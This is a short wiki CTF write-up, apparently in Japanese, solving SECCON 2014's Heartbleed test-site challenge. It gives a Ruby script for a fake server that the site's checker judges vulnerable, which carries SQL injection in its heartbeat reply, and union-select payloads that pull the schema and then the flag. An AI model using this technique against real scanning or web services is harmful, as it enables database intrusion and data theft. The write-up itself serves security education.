## page was renamed from CTF/Writeup/SECCON 2014 Quals Online Winter/Bleeding "Heartbleed" Test Web == Bleeding "Heartbleed" Test Web (Web 300pts) == 任意のサイトにheartbleedの脆弱性の有無を行えるサイトが与えられる。 メッセージの特徴から、https://gist.github.com/sh1n0b1/10100394 のスクリプトを利用してチェックをしていることが分かる。 また、HTMLのコメントからDBに結果を追加していることが分かる。 そこで、チェックのスクリプトからHeartbleed脆弱性がありと判断されるようなサーバーを作り、送信する文字列でSQLインジェクションを行なった。 {{{#!highlight ruby require 'socket' Thread.new do TCPServer.open '0.0.0.0', '8080' do |socket| s = socket.accept s.print [22,0,2].pack('Cnn')+ "\x0E\x0E" s.flush s.print [24,0,ARGV[0].size].pack('Cnn')+ ARGV[0] s.flush end end sleep 0.5 system "curl 'http://bleeding.pwn.seccon.jp/?ip=133.242.155.176&port=8080'" }}} {{{ $ ruby heartbleed.rb "' union select sql from sqlite_master limit 1 offset 1; -- " ... ... $ ruby heartbleed.rb "' union select flag from ssFlGss; -- " ... ... }}}